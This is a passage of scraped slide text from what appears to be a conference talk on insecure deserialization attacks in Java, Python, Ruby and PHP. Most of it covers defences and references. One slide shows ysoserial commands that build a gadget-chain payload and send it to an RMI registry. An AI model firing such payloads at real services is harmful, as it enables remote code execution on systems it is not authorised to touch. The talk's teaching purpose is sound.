  • 64. 64 Tool and utilities for generating Java deserialization exploit payloads Contains multiple gadget chain payloads − CommonsCollections1 (commons-collections) − CommonsCollections2 (commons-collections4) − Spring1 (spring-core, spring-beans) − Groovy1 (groovy) Create payload to execute calc.exe using CommonsCollections1 chain: $ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd | head -3 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat $ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe > payload.bin Send exploit payload to RMI Registry listener: $ java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe ysoserial: Usage info
  • 65. 65 Code Execution via Java Serializable JSF ViewState form parameters deserialized without authentication
  • 66. 66 Code Execution via Java Serializable JSF (MyFaces) ViewState form parameters deserialized
  • 67. 67
  • 68. 68 Code Execution via Java Serializable RMI Regisitry deserializing untrusted data from remoting protocol stream
  • 70. 70
  • 71. 71 General − Can only use classes available to application Java Serialization − ClassLoader of vulnerable code vs gadgets − Gadget classes must implement Serializable/Externalizable − Library/class version differences − Static type constraints Web frameworks − Many (but not all) now have sane defaults − Sign (and sometimes encrypt) client tokens: session cookies, viewstate, etc. Property Oriented Programming: Limitations & Caveats
  • 73. 73 Avoid open-ended (de)serialization when possible − If the serialization includes a class name, it’s probably bad Simple format and/or data types − Strings, Numbers, Arrays, Maps, etc. Manually serialize complex objects Keep session state on the server when possible − Beware of lateral attacks! (memcached, redis, database, etc.) Abstenence Avoid magic
  • 74. 74 Whitelist/Blacklist classes Constrain to expected type Statically typed object structure Schema-enforced formats Difficult without library support Restrict Deserialization Code defensively
  • 75. 75 Java − Default ObjectInputStream will deserialize any Serializable class − Class Blacklisting/Whitelisting − Subclass ObjectInputStream − override resolveClass() to allow/disallow classes − A bit of a hack − http://www.ibm.com/developerworks/library/se-lookahead/ Ruby − Default Marshal behavior deserializes any class − No obvious clean way to change − Maybe monkey patch Marshal hook methods on Object class (untested) PHP −  Restrict Deserialization
  • 76. 76 Python − Default unpickler will import any class − Pickle − Subclass Unpickler, override load_global − Load_global push safe classes onto pickler’s stack or raise an error − HACK according to the docs! − Cpickle − Set find_global to a function − Function takes module and class − Create on object or raise an error − https://docs.python.org/2/library/pickle.html − Section 11.1.6 Restrict Deserialization
  • 77. 77 Encryption != Authentication Authenticate channels − TLS Client Certs, SASL, DB/Cache/Broker credentials Authenticate content − HMAC or Authenticated Encryption with secret key Must be verified pre-deserialization! Pro-tip: Don’t leak crypto keys! Authenticate Trust Verify
  • 78. 78 Strict firewall rules for deserializing listeners Sandboxing/Hardening − Java SecurityManager − RestrictedPython − php.ini security settings − AppArmor − SELinux Security-in-depth Assume breach of defenses
  • 79. 79 Vulnerability is in doing unsafe deserialization, not in having gadgets available More will be always found Transitive dependencies cause library sprawl Cross-library gadget chains Auto-detection difficult Gadget Whack-a-Mole Don’t rely on this!
  • 80. 80 Find more unsafe deserialization Find more gadgets/chains Gadget finding tool improvements Explore mediums, platforms, formats, implementations Future Work (including for you) Go forth and pwn all the things
  • 81. 81 Stefan Esser, 2009/11/1, Shocking News in PHP Exploitation − https://www.nds.rub.de/media/hfs/attachments/files/2010/03/hackpra09_fu_esser_php_exploits1.pdf David Byrne, Rohini Sulatycki, 2010/6/21, Beware of Serialized GUI Objects Bearing Data − https://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf Stefan Esser, 2010/7/29, Utilizing Code Reuse/ROP in PHP Application Exploits − https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf Wouter Coekaerts, 2011/9/9, Spring Vulnerabilities − http://wouter.coekaerts.be/2011/spring-vulnerabilities Charlie Sommerville, 2013/1/10, Rails 3.2.10 Remote Code Execution − https://github.com/charliesome/charlie.bz/blob/master/posts/rails-3.2.10-remote-code-execution.md Arseniy Reutov, 2013/5/28, PHP Object Injection Revisited − https://prezi.com/5hif_vurb56p/php-object-injection-revisited/ Stephen Coty, 2013/6/14, Writing Exploits for Exotic Bug Classes: unserialize() − https://www.alertlogic.com/blog/writing-exploits-for-exotic-bug-classes/ Ben Murphy, 2013/6/23, Property Oriented Programming Applied to Ruby − http://slides.com/benmurphy/property-oriented-programming#/ Robert Heaton, 2013/7/22, How to hack a Rails app using its secret_token − http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/ Dinis Cruz, 2013/8/6, Using XMLDecoder to execute server-side Java Code on an Restlet application − http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html Past Work / References
  • 82. 82 Abraham Kang, Dinis Cruz, Alvaro Munoz, 2013/8/6, RESTing on your laurels will get you pwned − http://www.slideshare.net/DinisCruz/res-ting-on-your-laurels-will-get-you-powned4-3 Tom Van Goethem, 2013/9/11, WordPress < 3.6.1 PHP Object Injection − https://vagosec.org/2013/09/wordpress-php-object-injection/ David Jorm, 2013/11/20, Java Deserialization Flaws: Part 1, Binary Deserialization − https://securityblog.redhat.com/2013/11/20/java-deserialization-flaws-part-1-binary-deserialization/ Alvaro Munoz, 2013/12/16, CVE-2011-2894: Deserialization Spring RCE − http://pwntester.com/blog/2013/12/16/cve-2011-2894-deserialization-spring-rce/ Dinis Cruz, 2013/12/22, XStream "Remote Code Execution" exploit on code from "Standard way to serialize and deserialize Objects with XStream" article, − http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html David Jorm, 2014/1/23, Java deserialization flaws: Part 2, XML deserialization − https://securityblog.redhat.com/2014/01/23/java-deserialization-flaws-part-2-xml-deserialization/ Johannes Dahse, Nikolai Krein, Thorsten Holz, 2014/11/3, Code Reuse Attacks in PHP: Automated POP Chain Generation − https://websec.files.wordpress.com/2010/11/rips_ccs.pdf − http://syssec.rub.de/media/emma/veroeffentlichungen/2014/09/10/POPChainGeneration-CCS14.pdf Renaud Dubourguais, Nicolas Collignon, JSF ViewState upside-down − http://www.synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf Past Work / References
  • 83. 83 Sample Apps − https://bitbucket.org/gebl/appseccali-cookie − https://bitbucket.org/gebl/appseccali-inapickle − https://bitbucket.org/gebl/appseccali-php − https://bitbucket.org/gebl/appseccali-jsf-el − https://github.com/frohoff/appseccali-rails-redis − https://github.com/frohoff/appseccali-java Tools − https://bitbucket.org/gebl/viewstatemesser − https://github.com/frohoff/rails_exploits − https://github.com/frohoff/ysoserial − https://github.com/frohoff/inspector-gadget Sample Apps and Tools
  • 84. 84 For more information on Qualcomm, visit us at: www.qualcomm.com & www.qualcomm.com/blog Qualcomm is a trademark of Qualcomm Incorporated, registered in the United States and other countries. Other products and brand names may be trademarks or registered trademarks of their respective owners Thank you Follow us on: Gabe Lawrence gabe@qualcomm.com @gebl Chris Frohoff cfrohoff@qualcomm.com @frohoff